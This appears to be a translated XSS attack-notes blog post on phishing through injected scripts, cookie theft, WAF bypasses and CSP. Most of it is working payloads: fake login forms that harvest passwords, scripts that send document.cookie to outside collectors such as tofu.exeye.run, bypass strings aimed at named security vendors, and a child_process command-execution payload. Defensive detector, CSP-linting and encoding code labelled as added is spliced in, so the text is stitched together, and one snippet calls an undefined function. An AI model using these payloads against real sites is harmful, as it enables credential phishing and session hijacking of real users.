XSS notes

Combining a phishing page with XSS
Typical: the CS + XSS combination
Five phishing methods

// ① plain alert
<script>alert(url)</script>
// ② remote script include
<script src="http://192.168.56.132/pkxss/xfish/fish.php"></script>
// ③ HTML-injection phishing
<script>alert(<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="phishing.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html>
)
</script>
// ④ redirect phishing
<script>document.location.href="http://www.baidu.com"</script>
// ⑤ iframe phishing
<iframe src="http://www.baidu.com" height="100%" width="100%"></iframe>

Usage: http://127.0.0.1/xsshack/login.php?id=<script src='http://127.0.0.1/xsshack/payload.js'></script>

Phishing page
Save a static copy of the real login page, then change the form tag's action so the credentials are posted to a back-end PHP file you set up yourself.

<!DOCTYPE html>
<html>
<meta charset="gbk"> 
<head>
<title>test </title> 
</head>
<body background="kd2.jpg" style=" background-repeat:no-repeat; background-size:100% 100%; background-attachment:fixed;">
<p> </p>
<!-- once the page is set up, test.php handles the submitted data -->
<form style="text-align:center" action="test.php" method="post">
用户: <input type="text" name="user" value="user"><br>
密码: <input type="password" name="mima" value="Mouse"><br>
 
<input type="submit" value="绑定">
</form>
<p style="text-align:center">点击"提交"按钮,表单数据将被发送到服务器上的“test.php”。</p>
</body>
</html>

② Stealing the cookie value with XSS
Obtained via the redirect method

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

③ Reflected and DOM-based XSS
1) POST-based XSS technique
Source:

<html>
<body>
<form  name="form" id="form1" method="post" action="http://www.ncufz.net/gkcx/searchzj.asp">
<input type="text" name="keywords" hidden="true" value='test"><sCRiPt sRC=></sCrIpT>'/>
</form>
<script>
document.getElementById('form1').submit();
</script>
</body>
</html>

Note: in name, set the field name the target page submits;
in action, the page the form is submitted to;
in value, the injected content.
2) DOM XSS technique
Inject through parameters that the page hands to its own code
Typically a JS file is used in combination to form a DOM XSS injection
3) Flash phishing page

 var html="%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%0A%3Chead%3E%0A%3Cmeta%20charset%3D%22utf-8%22%3E%0A%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3Dedge%22%3E%0A%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2Cinitial-scale%3D1.0%22%3E%0A%3Cstyle%3E%0A%09/*%20%20%u516C%u5171%u6837%u5F0F%20%u4E0D%u662F%u5FC5%u987B*/%0A%09*%7B%0A%09%09padding%3A0%3B%0A%09%09margin%3A0%3B%0A%09%7D%0A%0A%0A%0A%0A%09/*%20%20%u5954%u6E83%u9875%u9762%u6837%u5F0F%20*/%0A%09.whole-error-container%7B%0A%09%09position%3A%20fixed%3B%0A%09%09left%3A0%3B%0A%09%09top%3A0%3B%0A%09%09width%3A100%25%3B%0A%09%09height%3A100%25%3B%0A%09%09z-index%3A%208000%3B%0A%09%09background%3A%20%237a7a7a%3B%0A%09%7D%0A%09.whole-error-content%7B%0A%09%09position%3A%20fixed%3B%0A%09%09left%3A50%25%3B%0A%09%09top%3A%2050%25%3B%0A%09%09-webkit-transform%3A%20translate%28-50%25%2C%20-50%25%29%3B%0A%09%09-ms-transform%3A%20translate%28-50%25%2C%20-50%25%29%3B%0A%09%09-moz-transform%3A%20translate%28-50%25%2C%20-50%25%29%3B%0A%09%09transform%3A%20translate%28-50%25%2C%20-50%25%29%3B%0A%09%7D%0A%09.whole-error-icon%7B%0A%09%09display%3Ablock%3B%0A%09%09margin%3A0%20auto%3B%0A%09%09width%3A48px%3B%0A%09%7D%0A%09.whole-error-info%7B%0A%09%09font-size%3A14px%3B%0A%09%09color%3A%23eee%3B%0A%09%09text-align%3A%20center%3B%0A%09%09padding-top%3A10px%3B%0A%09%7D%0A%09.whole-error-link-box%7B%0A%09%09padding-top%3A5px%3B%0A%09%09text-align%3A%20center%3B%0A%09%7D%0A%09.whole-error-link%7B%0A%09%09color%3A%23eee%3B%0A%09%09font-size%3A14px%3B%0A%09%09text-decoration%3A%20underline%3B%0A%09%7D%0A%3C/style%3E%0A%3C/head%3E%0A%0A%3Cbody%3E%0A%09%3Cdiv%20class%3D%22whole-error-container%22%3E%0A%09%09%3Cdiv%20class%3D%22whole-error-content%22%3E%0A%09%09%09%3Cimg%20class%3D%22whole-error-icon%22%20src%3D%22data%3Aimage/png%3Bbase64%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%22%20alt%3D%22%22%3E%0A%09%09%09%3Cp%20class%3D%22whole-error-info%22%3E%u63D2%u4EF6Adobe%20F
lash%u5DF2%u5D29%u6E83%3C/p%3E%0A%09%09%09%3Cdiv%20class%3D%22whole-error-link-box%22%3E%0A%09%09%09%09%3Ca%20class%3D%22whole-error-link%22%20href%3D%22https://www.baidu.com%22%3E%u91CD%u65B0%u4E0B%u8F7D%3C/a%3E%0A%09%09%09%3C/div%3E%0A%09%09%3C/div%3E%0A%09%3C/div%3E%0A%3C/body%3E%0A%0A%3C/html%3E";
html = unescape(html);
document.body.innerHTML = html;
// innerHTML does not execute inserted <script> tags, so they are re-run here;
// runScript is not defined in this snippet
const scripts = document.body.querySelectorAll('script');
for (let script of scripts) {
    runScript(script);
}


XSS probes and bypass techniques

Very good XSS reference material

XSS probes and uncommon tags

XSS probe

'';!--"<XSS>=&{()}

Uncommon tags

<style onload=alert(1) />
# Typical for guestbook/comment forms: the name field can be bypassed with this
<body onpageshow=alert(1)>
# Bypass using the body tag
<marquee behavior="alternate" onstart=alert(1)>hack the planet</marquee><marquee loop="1" onfinish=alert(1)>hack the planet</marquee><marquee onstart=alert(1)>hack the planet</marquee>
# marquee tag

# on-event on an h1 tag
<h1 onmousemove="alert('moved!')">this is a title</h1>
# link tag
<link rel="import" href="">
<link rel="prefetch" href="">  # HTML5 prefetch; only Google Chrome supports it
<link rel="dns-prefetch" href="">  # DNS prefetch
# XSS via HTML5 features
<input onfocus=write(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>
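From the defender's side, the probe string and the uncommon tags above are exactly what should light up in request logs. As an added example (not code from the original notes), the detector below percent-decodes the request target of combined-format access-log lines and runs a small rule set over it: the probe string itself, event-handler attributes inside a tag, script tags, javascript: URIs, and the autofocus + onfocus/onblur pair. The log lines are constructed for this example (hosts, paths and timestamps are made up) and the rules are my own, not a vendor's signatures.

```javascript
// Added example, not from the original post: a small detector that looks for
// the XSS probe string and the uncommon tag / event-handler patterns listed
// above in web-server access logs. Log lines below are constructed.

const XSS_PROBE = "'';!--\"<XSS>=&{()}";

// Each rule is a name plus a predicate over the decoded request target.
const RULES = [
  { name: 'probe-string',   test: s => s.includes(XSS_PROBE) || /<XSS>/i.test(s) },
  { name: 'event-handler',  test: s => /<\w+[^>]*\bon\w+\s*=/i.test(s) },
  { name: 'script-tag',     test: s => /<\/?script\b/i.test(s) },
  { name: 'javascript-uri', test: s => /\b(?:href|src|action)\s*=\s*["']?\s*javascript:/i.test(s) },
  { name: 'autofocus-trap', test: s => /\bautofocus\b/i.test(s) && /\bon(?:focus|blur)\s*=/i.test(s) },
];

// Percent-decode the request target (and '+' in the query) so encoded payloads are visible.
function decodeTarget(raw) {
  try { return decodeURIComponent(raw.replace(/\+/g, ' ')); }
  catch (e) { return raw; }  // malformed %-sequence: scan the raw text instead
}

// Return the names of the rules that match one combined-format log line.
function scanLine(line) {
  const m = line.match(/"(?:GET|POST|PUT)\s+(\S+)/);
  if (!m) return [];
  const target = decodeTarget(m[1]);
  return RULES.filter(r => r.test(target)).map(r => r.name);
}

// Keep only the lines that matched at least one rule.
function scanLog(lines) {
  return lines.map(l => ({ line: l, hits: scanLine(l) })).filter(r => r.hits.length > 0);
}

// Constructed sample log: one benign request, then the probe, a style/onload tag,
// a javascript: href and the autofocus/onfocus input from the notes above.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Nov/2020:11:09:31 +0800] "GET /search.php?q=hello+world HTTP/1.1" 200 512',
  '203.0.113.5 - - [10/Nov/2020:11:09:40 +0800] "GET /search.php?q=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D HTTP/1.1" 200 611',
  '203.0.113.5 - - [10/Nov/2020:11:09:52 +0800] "POST /guestbook.php?name=%3Cstyle+onload%3Dalert(1)+/%3E HTTP/1.1" 302 0',
  '203.0.113.5 - - [10/Nov/2020:11:10:03 +0800] "GET /profile.php?bio=%3Ca+href%3D%22javascript:alert(1)%22%3E1%3C/a%3E HTTP/1.1" 200 430',
  '203.0.113.5 - - [10/Nov/2020:11:10:15 +0800] "GET /login.php?id=%3Cinput+onfocus%3Dwrite(1)+autofocus%3E HTTP/1.1" 200 388',
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.hits.join(','), '<-', hit.line);
}
```

The decoder runs once, so a double-encoded payload (`%253C`) would slip past; in practice decode in a loop until the string stops changing, and treat POST bodies the same way, since the POST XSS technique above never puts the payload in the URL at all.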

Blacklist-bypass code patterns
Reason: the target's protection software blacklists every synonymous JavaScript action, even a plain alert

Output points

# Output directly inside a tag attribute; here onerror is the tag attribute
<img src=x onerror="" />
# Output inside a JavaScript variable; here name is a JavaScript variable
http://127.0.0.1/?name=\

Prevention

CSP (Content Security Policy)
Configuration

CSP syntax: directive-name source source; directive-name source ...
Common script-src keywords
'none': disallow loading from any source
'self': allow same-origin resources only
'unsafe-inline': allow inline JavaScript embedded in the page to execute
'unsafe-eval': allow eval() and other methods that create code from strings
For example:
default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src 'self';

default-src 'self' *.xx.com *.xx.cn aa.com 'unsafe-inline' 'unsafe-eval'

Two ways to deliver it

① meta tag: add a meta tag directly to the page
<meta http-equiv="Content-Security-Policy" content="default-src 'self' *.xx.com *.xx.cn 'unsafe-inline' 'unsafe-eval';">
② Server-side CSP configuration
Configuration, e.g.:
# Apache:
Add the following to your httpd.conf in your VirtualHost or in an .htaccess file:
Header set Content-Security-Policy "default-src 'self';"
# Nginx:
In your server {} block add:
add_header Content-Security-Policy "default-src 'self';";

Directive details

Directive: meaning
default-src: default loading policy for any resource type without its own directive
script-src: JS loading policy
style-src: CSS loading policy
img-src: image loading policy
media-src: loading policy for media resources such as audio and video
connect-src: loading policy for AJAX connections
font-src: font loading policy
object-src: loading policy for plugin resources such as object and embed
frame-src: frame loading policy
report-uri: if set, violation reports are submitted to this URI
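The two example policies above differ exactly in the keywords that matter for XSS. As an added example (not code from the original notes), the linter below parses a policy string with the "directive source source; ..." syntax described above and flags what the notes call unsafe: 'unsafe-inline' and 'unsafe-eval' in effect for scripts, wildcard hosts trusted for scripts, a missing default-src, and object-src left open. The fallback of script-src to default-src is CSP's own rule; which findings count as weak is my choice.

```javascript
// Added example, not from the original post: parse a Content-Security-Policy
// value into directives and flag the settings the notes above call unsafe.
// The two policies at the bottom are the ones quoted in the notes.

// "directive source source; directive source ..." -> { directive: [sources] }
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Returns an array of findings; an empty array means nothing weak was found.
function lintCsp(policy) {
  const d = parseCsp(policy);
  const findings = [];
  const defaultSrc = d['default-src'];
  // script-src falls back to default-src when it is not set explicitly
  const scriptSrc = d['script-src'] || defaultSrc;

  if (!defaultSrc) {
    findings.push('no default-src: resource types without their own directive are unrestricted');
  }
  if (!scriptSrc) {
    findings.push('no script-src and no default-src: script loading is unrestricted');
  } else {
    if (scriptSrc.includes("'unsafe-inline'")) {
      findings.push("'unsafe-inline' in effect for scripts: injected inline <script> and on* handlers run");
    }
    if (scriptSrc.includes("'unsafe-eval'")) {
      findings.push("'unsafe-eval' in effect for scripts: eval()/Function() on injected strings run");
    }
    for (const src of scriptSrc) {
      if (src === '*' || src.startsWith('*.')) {
        findings.push(`wildcard host ${src} trusted for scripts: any file hosted under it can be loaded`);
      }
    }
  }
  // object-src should be 'none' unless default-src already is
  if (!d['object-src'] && !(defaultSrc || []).includes("'none'")) {
    findings.push('object-src not restricted: plugin content (object/embed) may load');
  }
  return findings;
}

// The two example policies quoted in the notes above
const STRICT_POLICY = "default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src 'self';";
const LOOSE_POLICY = "default-src 'self' *.xx.com *.xx.cn aa.com 'unsafe-inline' 'unsafe-eval'";

for (const [label, policy] of [['strict', STRICT_POLICY], ['loose', LOOSE_POLICY]]) {
  const findings = lintCsp(policy);
  console.log(`${label}: ${findings.length} finding(s)`);
  for (const f of findings) console.log('  - ' + f);
}
```

Run against the strict policy this reports nothing; against the loose one it reports five findings, which is why that policy stops none of the bypasses listed later on this page. One caveat on the meta-tag delivery shown above: report-uri (and frame-ancestors) are ignored when the policy is set via meta, so violation reporting only works with the HTTP header variant.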

Bypasses

Single bypasses

① Pseudo-protocols

<a href="javascript:alert(1)">1</a>
<iframe src="javascript:alert(1)">
# the form tag only fires when the form is submitted
<form action="javascript:alert(1)"></form>

② Encoding bypass

Common encoding bypasses

① HTML entity encoding
② hex encoding
③ base64 encoding
④ UTF-8 encoding

③ Unclosed-tag bypass
If closing sequences are blocked --> consider leaving the tag unclosed

<script>alert(1)</script
# e.g. constructed as above

④ Loading a specified resource
E.g. a site's front end loads a file 1.js

![在这里插入图片描述](https://img-blog.csdnimg.cn/20201110110931862.png#pic_center)

Principle: the code above makes the site load JS from www.test.com
So the JS loaded above pulls in www.test.com's JS
In practice it is simple: host a 1.js file on your own site
containing alert(1)
and it gets loaded successfully

⑤ Numeric encoding bypass

\u003c in place of <
when symbols like < are filtered, switch to entity encoding to bypass
\u003e in place of the original >
<img src=1 onerr\or=alert&#x28;1&#x29;>
# if < and > are not filtered
# onload / onmousemove can be brought into the tag

Ideas for when alert and similar are filtered
Combined bypasses
① Encoded bracket + backticks instead of quotes

<svg onload> is blocked
<svg > onload> is not blocked
So construct:
<svg %26%2362 onload=alert`1`>  # i.e. encode the > to bypass

Three common vendor bypasses

# Yunsuo and Baidu Cloud Acceleration
	<svg %26%2362 onload=alert`1`>
# Qi An Xin
	<select autofocus onfocus=[2].find(alert)>
# SafeDog
	<img src=# οnerrοr=alert`2`>
	<input onfocus="document.body.appendChild(createElement('script')).src='//xss.xx/B6Bb'" autofocus>

A nice bypass


XSS phishing case studies

Case analysis

# 1) No filtering at all --> close the <a></a> tag directly with ">
2) <script> and similar are filtered, but " is not
Add content inside the <a> tag to escape the attribute
# e.g.
" οnclick="alert(1)
3) Breaking the length limit on XSS
Method 1 --> use eval, because it executes JS code
# " οnclick="eval(location.href.substr(80))" + put the payload code in the URL
# The handler takes everything after the 80th character of the URL, which is our payload; when the payload is long this saves characters!
Method 2 -->
combine a JS function the site already permits with eval
e.g.
#url="οnclick="eval(getParam(1))"&1=%24.ajax(%7Burl%3A'https%3A%2F%2Ftofu.exeye.run%2Flimit_check'%2Ctype%3A'post'%2Cdata%3A%7Bcookie%3Adocument.cookie%7D%2Csuccess%3Afunction(res)%7Balert(res)%7D%7D)
# obtains the cookie value, successfully bypassing the length limit
4) Splicing bypass
Applies when a filtered keyword is returned as an empty string --> i.e. the keyword is stripped out
So construct the keyword around the filter; when characters are stripped, test whether only one occurrence or every occurrence is removed
# "" οnclick="alert(1)"  does not get through
# "" onclonclickick="alert(1)"  gets through

Second type: wrapping the href attribute so as to bypass XSS filtering
Third type --> length-limited
Fourth type

Code to obtain another user's cookie

"" onclonclickick="$.ajax({url:`https://tofu.exeye.run/commit/check`,type:`post`,data:{cookie:document.cookie,xsser:`你自己的账户号码`}})"


XSS with command execution

< img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">

Hunting approach

Hunting points --> inject according to the surrounding tag

Two broad output categories --> HTML and CSS
inside a tag --> inside an attribute --> inside an event --> inside CSS

Output inside an HTML tag
<div>$var</div><a href=# >$var</a>
Inside an HTML attribute
<div id="abc" name="$var" ></div>
Inside an event
<a href=# onclick="funcA('$var')" >test</a>
Inside CSS
<style type="text/css">
body {background-image:url(${xss});}
body {background-image:expression(${xss});}
</style>

Inside JS
<script>var x =$var;</script>

Fix plan

① When the output is inside JS: filter < > / --> that is the first case; for the latter two cases the characters can be replaced with their &# entity forms (those three symbols)
1. <script>[output]</script>  # special tricks: ① QQ-style wide-byte injection, i.e. exploiting the server's own GBK encoding; ② use \ or / to bypass
2. <HTML tag onXXXX="...[output here]...">  # the latter two also count as tag output
3. <a href="javascript:[output here]">xxxx </a>
Equivalent symbols &#: handling these three classes is enough --> i.e. prevent the context from being closed so the payload cannot escape

② Output inside an HTML attribute --> general filtering method --> filter ", which otherwise lets an event attribute escape, as follows
乌云欢迎您" onclick="alert(1)
<input type="text" value="乌云欢迎您" οnclick="alert(1)" />
Specific filtering method --> filter \ --> applies when the output point is inside CSS
Reason: CSS allows escape characters, so \ + a hexadecimal ASCII code is enough to form a complete attack
<body style="overflow:auto;background-color:  i.e. the body-style case
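The fix plan above boils down to one rule: encode for the context the value lands in, so the closing character (", <, ', the CSS backslash) can never be supplied by the user. As an added example (not the post's own code), the functions below implement one encoder per output point from the hunting-points list (HTML tag, HTML attribute, JS string, CSS value) and render the same template shapes the notes use ($var, ${xss}). The template functions and the sample payloads are taken from the notes; the encoders themselves are mine.

```javascript
// Added example, not from the original post: one encoder per output context
// from the hunting-points list above, applied to the sample strings the notes use.

// HTML text and quoted attribute values: replace & < > " ' / with numeric entities,
// so a value can neither close the attribute nor open a new tag.
function encodeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, c => '&#' + c.charCodeAt(0) + ';');
}

// Inside a JavaScript string literal: \xHH / \uHHHH for every non-alphanumeric
// character, so neither a quote nor "</script" can end the literal or the tag.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Inside a CSS value: \HH followed by a space, so a user-supplied backslash is
// itself escaped and cannot start an escape sequence of its own.
function encodeCss(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => '\\' + c.charCodeAt(0).toString(16) + ' ');
}

// The output points from the notes, each rendered through the encoder for its context.
function renderInTag(v)       { return `<div>${encodeHtml(v)}</div>`; }
function renderInAttribute(v) { return `<input type="text" value="${encodeHtml(v)}" />`; }
function renderInJs(v)        { return `<script>var x = "${encodeJsString(v)}";</script>`; }
function renderInCss(v)       { return `<style>body {background-image:url(${encodeCss(v)});}</style>`; }

// Crude check: how many opening tags does the rendered markup contain?
// A correctly encoded value never adds one beyond the template's own.
function countTags(html) {
  return (html.match(/<\w+/g) || []).length;
}

// Sample values: the attribute-escape payload from the fix plan above and
// two constructed breakouts for the JS and CSS contexts.
const SAMPLES = {
  attribute: '乌云欢迎您" onclick="alert(1)',
  js:        '</script><script>alert(1)</script>',
  css:       'expression(alert(1))',
};

console.log(renderInAttribute(SAMPLES.attribute));
console.log(renderInJs(SAMPLES.js));
console.log(renderInCss(SAMPLES.css));
console.log('tags in attribute render:', countTags(renderInAttribute(SAMPLES.attribute)));
```

Note that the notes' "filter < > /" advice is the HTML-context rule only; the JS-string and CSS encoders have to escape far more, because in those contexts a quote, a semicolon or a backslash is enough to change meaning even without any angle bracket.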
③ Work out an escape based on the tag --> ② fuzz to see which tags and attributes are not banned --> ③ build a complete payload from the tags and attributes the fuzzing left
Typical test statement
<img src=1> to see whether it is parsed, i.e. whether an image placeholder appears on the page
then go on to try bypasses


Persistent XSS
Principle: chain hijacking techniques together to deliver XSS

Three methods:
① opener hijack
② link hijack
③ HTTP cache hijack --> principle: global request interception via Service Workers --> JS code intercepts the browser's HTTP requests for the current origin and returns cached files directly.

32 event-triggered XSS vectors
Persistent XSS caused by Service Workers

Author: goddemon